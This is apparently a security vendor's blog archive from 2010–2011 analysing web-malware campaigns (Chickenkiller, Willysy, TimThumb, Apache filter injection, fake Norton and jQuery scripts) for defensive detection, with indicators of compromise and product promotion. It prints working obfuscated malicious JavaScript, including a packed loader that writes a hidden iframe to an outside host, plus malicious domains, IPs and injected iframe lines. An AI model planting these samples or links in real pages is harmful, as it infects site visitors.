Archive

Posts Tagged ‘iframe’

Chickenkiller Infections

December 20th, 2011

Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

How do I identify the malicious code?
A new strain of web malware has been making the rounds over the last few months. This particular infection has been nicknamed Chickenkiller, after the chickenkiller.com domain its links use. It usually arrives as JavaScript obfuscated with Dean Edwards' Packer, recognisable by the eval(function(p,a,c,k,e,d){...}) wrapper.

An example is shown below:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));

Unpacked, the code is easier to read. hDcd() is a plain hex decoder. The hex string handed to it decodes to a div positioned far off screen (left: -1991px; top: -2999px) containing a 20x40 iframe whose src is hxxp://upflsvya.zyns.com/main.php?page=c69bd02e93e6957c, and the cookie check makes sure each visitor receives the iframe only once, so a second visit from the same browser will not show the injected markup:

function hDcd(data) {
    // Build a 256-entry table mapping each two-digit hex pair to its byte.
    var b16_digits = "0123456789abcdef";
    var b16_map = new Array;
    for (var i = 0; i < 256; i++) {
        b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
    }
    // Refuse anything that is not pure hex; left-pad odd-length input.
    if (!data.match(/^[a-f0-9]*$/i)) {
        return false;
    }
    if (data.length % 2) {
        data = "0" + data;
    }
    // Decode two characters at a time.
    var ll = data.length;
    var result = new Array;
    var j = 0;
    for (var i = 0; i < ll; i += 2) {
        result[j++] = b16_map[data.substr(i, 2)];
    }
    return result.join("");
}

// Inject the hidden iframe once per visitor, then set a cookie so it is not repeated.
if (document.cookie.indexOf("cookieh=enabled") == -1) {
    document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
    document.cookie = "cookieh=enabled";
}

Which sites are aiding the attack?
The malicious links associated with the “packed” JavaScript code are listed below.

hxxp://chicknercx43.chickenkiller.com/i.php?go=1
hxxp://zxr0.chickenkiller.com/kat3/gate.php
hxxp://bugs.chickenkiller.com:10/images/1.htm
hxxp://peacockog45g45.chickenkiller.com/

All of these hostnames resolved to the same IP address at the time of writing. The reverse name of that host leaves little doubt about intent: it was set up specifically to spread malware.

IP address:	77.232.70.33
Hostname:	bl4ckh4x0rs.com

At the time of writing the malware had been found on many sites, including:

phislin.com
827512.com
jinti.com
cnad.com
siwayishu.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

Willysy Injection Attacks

December 1st, 2011

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

In this article we discuss the major outbreak of the “willysy.com” injection attack, which at one point affected more than 100,000 websites.

What is the Willysy attack?
In this code injection attack, malicious hackers inject iframes into benign websites. The iframe is an HTML element that loads content from another URL, possibly on a completely different site, into a page on your own website. Think of it as a shipping container that fits like a Lego block on your ship: the container can carry cargo from a source you have no control over.

Once a benign website is compromised, an iframe is injected into its pages. The iframe loads content from an exploit site, and the browsers of visitors who trust the site are attacked when they view the page.

What vulnerabilities are being exploited?
osCommerce sites are the primary target of this attack, and known osCommerce vulnerabilities are being exploited to get in.

Those server-side flaws are how attackers get into legitimate sites. Once the iframe is in place, visitors are sent to an exploit site that tries several client-side exploits in order to install malware on their machines, including:

CVE-2010-1885 (Windows Help and Support Center, hcp:// protocol handler)
CVE-2010-0886 (Java Deployment Toolkit)
CVE-2010-0188 (Adobe Reader and Acrobat, malformed TIFF)
CVE-2006-0003 (MDAC RDS.Dataspace ActiveX control)

Is my website infected?
To determine whether your website is infected, search for the malware listed below using tools like grep (or WinGrep), or have StopTheHacker's Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. Clean up the infection by removing every instance of the malware from your web pages, and bear in mind that this removes only the symptom: unless the vulnerability that let the attacker in is closed and any backdoor left behind is found, the iframe will be back.

Another indicator is to search your server log files for requests from the IP addresses below. If you find them, look very closely at whether your site has been compromised.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site runs osCommerce you should be even more alert. Since this infection is most prevalent on osCommerce sites, upgrade to the latest osCommerce release, restrict access to the admin directory (for example with HTTP authentication, or by renaming it) and check your file permissions. Note that 644 is a file mode: applied to a directory it makes the directory unusable by the web server. Files should be 644 or more restrictive; directories need the execute bit (typically 755, or 750 where that works for your hosting setup), and nothing under the web root should be world-writable.

Which sites are aiding the attack?
The following sites have been seen spreading the malware so far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware distribution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

TimThumb Malware

August 30th, 2011

The ability to integrate third-party plugins and themes into a CMS like WordPress lets website owners add new functionality to an existing site. Unfortunately, this feature comes at a price.

Third-party plugins and themes often have security vulnerabilities that let malicious hackers break into websites and use them to distribute malware. In this article we look at TimThumb, an image-resizing script that ships inside many WordPress themes and plugins.

What is TimThumb?
TimThumb is a small PHP script for cropping, zooming, and resizing images (jpg, png, gif) on the web. It is used widely on blogs and in other applications.

The Problem
The main script is timthumb.php. It lets a site load an image and resize it on the fly, while keeping a cache of resized images to save bandwidth and speed up page loads.

It is this functionality that was targeted by the zero-day TimThumb attack. TimThumb fetches images from external sites and stores them in a directory on the web server, which is a very attractive vector for an attacker. Keep in mind, though, that TimThumb itself does not execute the malicious code: it is merely the delivery mechanism that gets the attacker's file onto the server, where the web server then runs it like any other PHP file.

The root cause is storing externally sourced content in a publicly accessible web server directory while checking its origin with a flawed test: TimThumb's check of which remote hosts it would fetch from could be satisfied by a hostname that merely contained a trusted name, so an attacker could have it fetch and store a PHP file instead of an image. This flaw has allowed malicious hackers to distribute malicious code from many websites.

A very good writeup on this topic is presented here.

Analysis
The malware runs each time the page is loaded by the website visitor’s browser. Malicious advertisements are displayed to the user and a malicious redirection may occur (sites we listed in our recent post).

  • A malicious script is often deposited in the cache directory (the directory TimThumb uses to store cached images)
    • The malicious script may be a c99/c100 shell
    • These shells are web based, giving the attacker remote control of your website and hosting account
  • Base64-encoded malware is injected into wp-blog-header.php
  • JavaScript files may be modified (l10n.js and jquery.js are the primary targets)

A sample of the injected code (truncated):

var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63..
\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37..
eval (function (_0x2f46x1,_0x2f46x2

How do I protect my site?
StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security

IFRAME-based Web-Malware

August 26th, 2011

The IFRAME element, part of the HTML specification, continues to be a favorite attack vector for malicious hackers. Loading a malicious payload through an IFRAME is extremely easy and effective. Attackers compromise websites and use them to attack the visitors of other websites by loading malware from external locations, often other hacked sites. Think of it as a chain of malware propagating from one infected website to another.

Since March 2011, one of the most popular IFRAME injection attack campaigns used the URLs we list below. We have recorded many websites infected by malware as part of this IFRAME injection attack.

What links are injected?
Some of the most common injected IFRAME sources are listed below:

iframe src="hxxp://videoonlinefree.co.cc/hck"
iframe src="hxxp://quadmatrix.co.cc/download/" <!-- can be injected within a DIV -->
iframe src="hxxp://join4freemoney.co.cc/"
iframe src="hxxp://hentai-3d-gifs.co.cc"
iframe src="hxxp://Allisson-Lozz.co.cc"

Recent TimThumb hacks include the following malware links:

iframe src="hxxp://blluerebadunn.us.to/kwizhveo.php"
iframe src="hxxp://sexyyjeannetteh.us.to/kwizhveo.php"
iframe src="hxxp://seeven71.us.to/kwizhveo.php"
iframe src="hxxp://gufmaurr79.us.to/kwizhveo.php"
iframe src="hxxp://cooldeliia97.us.to/kwizhveo.php"
iframe src="hxxp://bastalevarrga.us.to/kwizhveo.php"
iframe src="hxxp://sexyjju88.us.to/kwizhveo.php"
iframe src="hxxp://heidiheernande.us.to/kwizhveo.php"
iframe src="hxxp://blaackhatt58.us.to/kwizhveo.php"
iframe src="hxxp://coolerikpowwel.us.to/kwizhveo.php"
iframe src="hxxp://freeagcoll.us.to/kwizhveo.php"
iframe src="hxxp://nightllup80.us.to/kwizhveo.php"
iframe src="hxxp://prettyrosseande.us.to/kwizhveo.php"

How do I protect my site?
Webmasters and administrators should search for instances of each malicious link in their sites to ensure that they remove all occurrences of the injected links. More importantly, it is critical to identify the vulnerability that allowed the site compromise and ultimately the IFRAME injection.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

Apache Used to Inject Malware

May 23rd, 2011

Malware authors are constantly coming up with new ways to compromise websites. Websites are now the weakest link in the security chain: malicious hackers break into them and use them to push viruses to visitors, whose infected PCs are in turn recruited into botnets. Customer data and the reputation of the website and the online business are at stake. In this article we highlight a relatively new way that hackers can infect websites.

Apache Filter Based Malware
We have recently noted a new development in the world of web-malware. Malicious hackers have begun using the Apache web server's filter mechanism to inject malware into web pages. It works much as if the mailman stuck a piece of gum (highly unlikely in real life) onto the clean envelope you dropped in the mailbox. The recipient might complain to you about the gum (the malware), and most people would be at a loss to determine where it came from.

This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web servers in use today. It is extremely flexible, scalable and very reliable, so it is no wonder it is a good choice for webmasters, web hosts and website owners. Malicious hackers are banking on the popularity of Apache to give them the most bang for the buck.

Apache, through its flexibility, lets programmers create “filters”: hooks that see and modify response data in real time before it leaves the server (output filters such as those provided by mod_ext_filter and mod_substitute, or one implemented in a custom module). If you wanted to add an advertisement to every page served from the web server, this functionality would be of great use. Now filters are being abused by malicious hackers, who use them to insert a piece of malware containing an iframe like the one below.

This piece of malware leads to a fake AV site:

iframe src="hxxp://crocabhysanr4.cz.cc/[scrubbed]"

Even though this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

Nuances
To clarify, this new kind of malware injection does not imply that Apache is compromised or has a vulnerability. The Apache “filter” functionality is a legitimate feature being abused by attackers who have already gained unauthorized access to the web server's configuration. The attack is extremely effective, since it can “infect” every page served without changing a single content file: file-integrity monitoring of the document root sees nothing, and only a comparison of what is served against what is on disk, together with an audit of the Apache configuration and loaded modules, reveals it.

In the past there has been .htaccess-based malware that tries to evade detection by serving infected pages only when a user arrives at the compromised site via a search engine like Google. This malware is much more sophisticated. It injects malware into the HTML pages leaving the web server, but only according to the following rules.

The malware is not injected into outgoing web pages if:

  • The incoming HTTP request is coming from an IP which belongs to a search engine
  • The incoming HTTP request is coming from certain browser User Agents
  • The administrator is logged in or an administrator owned process is running

Additionally, the very first time a user requests a page, a session token is created for the connection, but the malware is not delivered on that first request. It is delivered the second time the same user, using the same session, requests a page. The process serves the malware only once and then adds the user's IP address to a list so that it does not try to infect the same host again. Together, these rules keep the payload away from search engine crawlers, from anyone who fetches a page just once (which is what most scanners and one-off curl checks do) and from repeat visitors, which reduces the chance that an anti-virus vendor or researcher ever sees it.

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

Report, Security

Web-Malware with a Sense of Style

February 7th, 2011

Web based malware is interesting in the way it changes. This threat can destroy the reputation of websites and online businesses, get them blacklisted by search engines and hurt their customers and visitors. Every single day, close to 6,600 new websites are added to popular malware blacklists. In this article we discuss the evolution of a particular piece of web-malware that its authors keep reworking to avoid detection.

Web-malware is malicious computer code, like computer viruses, but injected into web pages on unsuspecting benign websites. The owners of these websites, for the most part, remain blissfully unaware that they are hurting their customers and visitors by infecting them with malware. By virtue of being party to the malware distribution network, these legitimate websites are ultimately blacklisted by search engines, various filters and end up inaccessible to their users until they are cleaned up. This leads to loss of revenue, loss of reputation and tremendous heartache.

Malware Evolution
We observe many new strains of web-malware every day. One interesting strain, which has been recurring for the past year or so, is presented in this article. We will show you how it has “evolved.” The reason for the evolution is to avoid detection by scanning systems.

The technology we use at Stopthehacker.com (STH) does not work like traditional anti-virus software, however. We can detect each version of the malware, even though each looks and acts a little differently from the earlier ones. Scanning technology at STH uses machine learning and artificial intelligence techniques to hunt down malware and even spam on web pages. We protect the reputation of websites and prevent loss of business due to blacklisting.

Let’s look at each version of the web-malware below.

Version 1:
Also found on jsunpack.

<skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;</skript>

Version 2:
Found on rexbd.net.

<span style="color:#0000BB"><skript></span>var WnmaQ={YYSXc:function(){l=<span style="color:#DD0000">&#039;&#039;</span>;var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS=<span style="color:#DD0000">"mS"</span>;var s=false;this.zN=false;var u=<span style="color:#DD0000">""</span>;var o = g.getMonth();var r = <span style="color:#DD0000">"from"</span> + g.getMonth() + <span style="color:#DD0000">"e"</span>;function t(){};d=<span style="color:#DD0000">&#039;&#039;</span>;r = r.replace(10, <span style="color:#DD0000">"CharCod"</span>);a=<span style="color:#DD0000">""</span>;this.bX=<span style="color:#DD0000">&#039;&#039;</span>; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA=<span style="color:#DD0000">""</span>;var x=false;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){this.tT=false;var fU=<span style="color:#DD0000">"fU"</span>;this.nT=62782;var jC=<span style="color:#DD0000">&#039;&#039;</span>;var b=i[gP].cssRules||i[gP].rules;aV=<span style="color:#DD0000">""</span>;var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ=<span style="color:#DD0000">&#039;&#039;</span>;this.mB=29481;var xM=function(){return <span style="color:#DD0000">&#039;xM&#039;</span>};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return <span style="color:#DD0000">&#039;bG&#039;</span>};var p=<span style="color:#DD0000">"p"</span>;if(!q.selectorText.match(/#c(\d+)/))continue;var nE=<span style="color:#DD0000">&#039;&#039;</span>;var gT=new Array();w=q.style.backgroundImage.match(/url\(<span style="color:#DD0000">"?data\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\)/)[1];this.lE="</span><span style="color:#DD0000">";mG=41875;};var gH=function(){};var e=false;}gG="</span>gG<span style="color:#DD0000">";var cB=28236;var zE=55721;bJ=false;var j="</span><span style="color:#DD0000">";function jI(){};var cO=&#039;</span><span 
style="color:#DD0000">&#039;;c=function(){return {oZUd:"</span>split<span style="color:#DD0000">"}}().oZUd;gB="</span>gB<span style="color:#DD0000">";sG=48086;var jA=function(){};this.tH=false;var m=w;

Version 3:
Found on www.twosixandbrush.com (https://badwarebusters.org/main/itemview/24057).

<style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5,45,22,27,7,32.5,51.5,44.5,25,13.5,40.5,8.5,14,15,4,11,20,11,34.5,15,43,47,15,7,9.5,3.5,21.5,20.5,24,14,28.5,26.5,13.5,19,7.5,9,29.5,13.5,26.5,8.5,9.5,33,14,18,25,18,38,3,18.5,9.5,40,32,33.5,42.5,38.5,23.5,14.5,6,7,13.5,38,19,33.5,20,5,27,12,12,8.5,2.5,14,42,38,20,20.5,18,30.5,12,44,16.5,13,8,29.5,43,44,14,11,16,38.5,22,42.5,3.5,32.5,23.5,9,25,5.5,5,5.5,6,11.5,49.5,44,41,25,12.5,3.5,45,24,42.5,9,8.5,43,16,40,52,33,3,25.5,41.5,30,28.5,44.5,5.5,16.5,14,26.5,38.5,29.5,11,6.5,19,36.5,34.5,26.5,34,20,27.5,5.5,6.5,19.5,20.5,16.5,15.5,13.5,7,9.5,25,23,10,14.5,32,23.5,28.5,49.5,23.5,19,5,12,27,2);}</style>   <skript>var WnmaQ={YYSXc:function(){l='';var  v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42,  57);this.mS="mS";var s=false;this.zN=false;var u="";var o =  g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r =  r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var  f=function(){};var i=document.styleSheets;zA="";var x=false;for(var  gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var  jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var  n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var  xM=function(){return 'xM'};var  q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return  'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var  nE='';var gT=new  Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var  gH=function(){};var e=false;}gG="gG";var cB=28236;var  zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return  {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var  jA=function(){};this.tH=false;var  m=w;

Analysis
Notice the difference between the variants. In the second example the entire payload is wrapped in style information (span elements carrying colour styles). This is intended to fool scanners that analyse the code inside the script tag: if they cannot make sense of the block as a whole, they classify it as just another benign HTML styling element. In the third case the payload itself has moved outside the script. The numbers are stored in a CSS rule (#c19{background:url(data:,8,17.5,...)}) and the script is only a loader that walks document.styleSheets, picks out the rule whose selector matches /#c(\d+)/ and reads the numbers back out of its backgroundImage. A scanner that looks at the script alone sees no payload, and one that looks at the style alone sees only odd CSS; it has to correlate the “pseudo-style” data with the loader code and mark the whole block as unsafe. The scanner technology at STH does exactly this. The loader also hides the name of the decoding function it needs: new Date(2011, 10, 12, ...).getMonth() returns 10, so "from" + 10 + "e" is "from10e", and replace(10, "CharCod") turns that into "fromCharCode" without the string ever appearing in the source.

Conclusion
Authors of web-malware are trying to hide their code. This may be the effect of increased capability in scanning technologies and a raised awareness among webmasters and web-surfers making it more difficult for malicious hackers to do their deeds. This is a good sign.

Till next time.

Report, Security

Web-Malware Faking Norton

January 18th, 2011

The growth of web-based malware continues unabated. Malware developers are targeting websites to distribute malicious viruses, Trojans and other harmful computer programs. This modern modus operandi banks on the fact that most websites have weak security and can be easily compromised. In fact even the top 15 financial institutions have vulnerabilities. In this article, we describe another relatively new trick that malware developers are using to avoid detection of their malicious code.

The Phenomenon
Website compromise is a growing trend. More than 6,600 new websites get hacked every single day and consequently become distributors of malware and are blacklisted as a result. These websites lose business and customer trust, not to mention that these compromised websites can become part of the chain of information theft.

Fake anti-virus advertisements have been around for a long time. Niels Provos of Google posted a great article about this. Symantec (Norton) also published information on the trend. Malware authors are playing on the tendency of unsuspecting users to trust any software that says “Anti-Virus” or “Malware Scan” on it.

Web-Malware Posing as Norton Anti-Virus
This post is not only about fake anti-virus posing as the real thing, but also about web-malware that borrows the names of anti-virus software. Malware authors find insecure websites and compromise them using “code injection”: malicious code is inserted into a page and executed by the browser (Internet Explorer, Safari, Firefox, Opera, etc.) of every visitor, while the owner of the website remains oblivious that an attack has taken place. Below is an example of malicious code found on an unsuspecting website.

document.write'< cript src=http://ftmlive.com/[scrubbed]/nortonsw_[scrubbed].php></ cript>

This particular code was mined from a page on pinnaclevillas.com. The malware was found on ftmlive.com on 2010-11-06.

Conclusion
This was just one of the many examples of malware we see on a daily basis pretending that it is a legitimate piece of software. In this case, the code is using a naming convention where the file which actually loads the attack payload includes “nortonsw” in its name in the hope that an administrator or user will assume it’s a Norton Anti-Virus related file.

Interestingly, this naming convention is used by Norton’s Safe Web service where administrators must put up a page on their site with a name similar to “nortonsw_(unique code).html” for verification by Norton. It seems that malicious hackers are targeting the mechanism that Norton Safe Web uses to verify sites to cloak their malicious code. We have seen this use of familiar naming conventions to be on the rise.

Till next time… when we post more interesting code samples and analysis.

News, Report, Security

Malware Posing as jQuery

January 14th, 2011

Web-based malware is the new bane of the Internet. Malware developers have focused on using websites to distribute millions of copies of viruses, Trojans and other malicious programs. This modus operandi banks on the fact that most websites' security is weak and easily compromised. In this article we want to raise awareness of how malware developers hide their malicious code from website administrators and security software.

The Phenomenon
The number of websites being hacked grows by the day. More than 6,600 new websites get hacked every single day and consequently become distributors of malware and are subsequently blacklisted. This results in lost business and customer trust, not to mention that these compromised websites can become part of the chain of information theft.

Attack patterns change hourly. Consider, for example, that on any given day 200,000 samples of web-based malware are identified on websites across the Internet. Firewalls, Web Application Firewalls (WAFs) and other security software make it harder for hackers to penetrate website security, but given the sheer volume and variety of malware, it is impossible for security vendors to deliver signatures in real time.

Malware Posing as jQuery
One way hackers fly under the radar, while causing immense damage to visitors of compromised websites, is to make their malicious code look like trusted code developed by a reputable organization. We present an example below.

var jquery = eval('wjign&dxogwj.;e&v&a;l;'.replace(/[g&;jx]/g, ''));
jquery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x75\x56\x47\x34\x28\x66\x4d\x36\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x74\x44\x36\x42\x48\x28\x62\x62\x52\x35\x78\x29\x7b\x76\x61\x72\x20\x67\x33\x67\x39\x3d\x30\x3b\x76\x61\x72\x20\x66\x47\x50\x59\x44\x41\x53\x3d\x62\x62\x52\x35\x78\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x69\x4e\x49\x4a\x6b\x76\x6b\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x69\x4e\x49\x4a\x6b\x76\x6b\x3c\x66\x47\x50\x59\x44\x41\x53\x29\x7b\x67\x33\x67\x39\x2b\x3d\x70\x4b\x76\x35\x32\x28\x62\x62\x52\x35\x78\x2c\x69\x4e\x49\x4a\x6b\x76\x6b\x29\x2a\x66\x47\x50\x59\x44\x41\x53\x3b\x69\x4e\x49\x4a\x6b\x76\x6b\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x67\x33\x67\x39\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x4b\x76\x35\x32\x28\x67\x51\x52\x2c\x7a\x72\x77\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x67\x51\x52\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x7a\x72\x77\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x73\x44\x30\x76\x6c\x78\x3d\x65\x76

This particular code was mined from a page on:

http://www.acc4arab.com/newsite/[scrubbed].shtml

This is just one of many examples of malware we see on a daily basis pretending to be a legitimate piece of software. Here the naming convention does the hiding: the payload is run through an innocuous-sounding variable whose name matches a well known JavaScript framework used widely by developers, jQuery. Look closely at the first line, though: the replace() strips the characters g, &, ;, j and x from the padded string, leaving window.eval, so jquery is nothing but an alias for eval, and the \x-escaped argument (which begins function uVG4(fM6){ and is truncated above) is the real payload. In the past we have seen hackers targeting jQuery in a slightly different manner. An interesting related post: Down the rabbit hole.

Protect Your Website
Website owners should take advantage of new and emerging website health-monitoring solutions. This kind of technology scans websites without interruption, is completely SaaS-based and uses advanced artificial-intelligence mechanisms to catch never-before-seen malware. This is a significant break from the way most traditional anti-virus software works. Simply scanning for signatures is not enough to detect the thousands of new malware variants. Consider, for example, that current anti-virus engines cannot detect web-based malware effectively.

Use of new scanning technology such as on-demand web scanning can help website owners protect their reputation and maintain business continuity.

Till next time…


Is Posterous’ Posting Policy Secure?

July 14th, 2010

Services like Posterous have changed the way Internet users post information about themselves, their likes, and their dislikes. Posterous follows a very simple model.

A user simply needs to send an email to post@posterous.com; they can attach files, such as music that they like, and post them to their personal page. It's very easy to use. You can literally create your own page with a single email. Posterous has already chalked up thousands of avid users.

Motivation
The goal of this article is to highlight how a service like Posterous needs to harden itself against misuse by malicious individuals and groups. We will be exploring some of the potential loopholes of the Posterous model. We will not be discussing or revealing any exploit code.

Exploring this facet of services like Posterous helps uncover the various attack surfaces that malicious entities can use to compromise such an excellent service. Through this exercise, perhaps we can help services like Posterous improve upon their existing architecture.

Methodology
We will use the following metrics to determine the safety of Posterous’s current service.

  1. Can we post with an email where the originating server IP does not match the sender’s domain?
  2. Can we post a malicious link (hyperlink)?
  3. Can we post a malicious iframe?
  4. Can we post a malicious script?
  5. Can we post a malicious binary?

Before we proceed, we will outline how the experiment was set up. A new account was set up using an email sent to Posterous (by new account, we imply a new blog post, not a registered user account).

Once the blog post was created, we analyzed it to see if the content in the outgoing email to Posterous was actually present in the blog post. If the content was in the post, we analyzed it to see whether or not it had been modified. The experiment was conducted on Friday, July 9, 2010.

Analysis
Now we will describe the results of some of the tests that we conducted.

  1. Can we post with an email where the originating server IP does not match the sender’s domain? Yes
  2. Can we post a malicious link (hyperlink)? Yes and No
    • For unregistered accounts, it seems that a hyperlink is prefaced with http://emailusername-kb3zz.posterous.com/ so a malicious link will not be triggered.
    • For registered accounts, it seems you can put up links without this prefix. We have confirmed posting of malicious links with examples from Malware Patrol, Google’s Safe Browsing List and others.
    • Update: Gary Tan from Posterous let us know that they are using link pre-filtering and will be expanding their capabilities by incorporating more lists. This is good to hear.
  3. Can we post a malicious iframe? Yes
    In fact, an iframe can be posted from non-registered mode. This is a mechanism that a bad guy might try to exploit (screenshot attached below; of course, it's a benign iframe).

    • Update: Gary Tan from Posterous let us know that they prevent iframe posts from taking up the full page by sanitizing size attributes, mitigating the main problem with iframes.
  4. Can we post a malicious script? No
    Posterous scrubs scripts attached to the email and does not let them post to the blog. It remains to be seen, though, whether any malicious encoding would allow a script to get through.
  5. Can we post a malicious binary? Not tested

Note: No malicious content (iframes, scripts, binaries) was ever uploaded to the blog during testing.
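As an added illustration, not Posterous's own code, here is a Python filter that reproduces the three controls the findings above describe: script elements are scrubbed together with their bodies, iframe size attributes are clamped, and link targets are checked against a blocklist. The blocklist, the size cap and the sample post are constructed for the example and stand in for the Malware Patrol and Safe Browsing data the post mentions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse
# Constructed stand-ins for the link lists and iframe size sanitizing the
# post describes; none of these values come from Posterous.
LINK_BLOCKLIST = {"malware.example"}
MAX_IFRAME_PX = 300
SAMPLE_POST = ('<p>Hi &amp; welcome</p><script>x()</script><iframe width="2000"'
               ' height="100%" src="http://frame.example/"></iframe><a href='
               '"http://malware.example/x">bad</a><a href="http://ok.example/">ok</a>')
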